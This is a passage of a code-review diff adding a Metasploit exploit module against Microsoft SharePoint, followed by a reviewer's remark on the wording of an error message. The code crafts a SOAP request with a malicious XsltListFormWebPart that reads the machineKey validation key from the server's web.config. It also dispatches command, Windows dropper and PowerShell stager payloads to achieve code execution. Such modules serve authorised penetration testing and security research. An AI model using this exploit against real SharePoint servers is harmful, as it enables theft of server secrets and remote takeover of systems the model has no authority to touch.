modules/exploits/windows/http/sharepoint_unsafe_control.rb

```diff
@@ -0,0 +1,249 @@
+      execute_command(payload.encoded)
+    when :win_dropper
+      execute_cmdstager
+    when :psh_stager
+      execute_command(cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      ))
+    end
+  end
+
+  def leak_web_config
+    print_status('Leaking the ViewState validation key...')
+
+    web_id = sharepoint_get_site_web_id('cookie' => cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve the site web ID') unless web_id
+
+    webpart = <<~WEBPART
+      <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
+      <%@ Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" %>
+    WEBPART
+    webpart << Nokogiri::XML(<<-WEBPART, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="#{datastore['SP_LIST'].encode(xml: :text)}" WebId="{#{web_id.encode(xml: :text)}}">
+        <DataSources>
+          <att:xmldatasource runat="server" id="XDS1"
+            XPath="/configuration/system.web/machineKey"
+            datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />
+        </DataSources>
+        <xsl>
+            <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
+                <xsl:output method="xml" indent="yes" />
+                <xsl:template match="/">
+                    <xsl:copy-of select="." />
+                </xsl:template>
+            </xsl:stylesheet>
+        </xsl>
+      </WebPartPages:XsltListFormWebPart>
+    WEBPART
+
+    envelope = '<?xml version="1.0" encoding="utf-8"?>'
+    envelope << Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
+        <soap12:Body>
+          <RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages">
+            <webPartXml>#{webpart.encode(xml: :text)}</webPartXml>
+          </RenderWebPartForEdit>
+        </soap12:Body>
+      </soap12:Envelope>
+    ENVELOPE
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '_vti_bin', 'WebPartPages.asmx'),
+      'cookie' => cookie,
+      'ctype' => 'application/soap+xml; charset=utf-8',
+      'data' => envelope
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+    end
+
+    unless res.code == 200
+      fail_with(Failure::NotFound, "Failed to retrieve #{normalize_uri(target_uri.path, '_vti_bin', 'WebPartPages.asmx')}")
```

Comment:
The word `retrieve` here is a little odd to me. Technically its that you couldn't find the page on the server, as you aren't downloading the page or similar. Given this is an information leak one might also mistakenly assume from the output that this is a page we need to leak to proceed when in reality this is not the case. Just some thoughts though.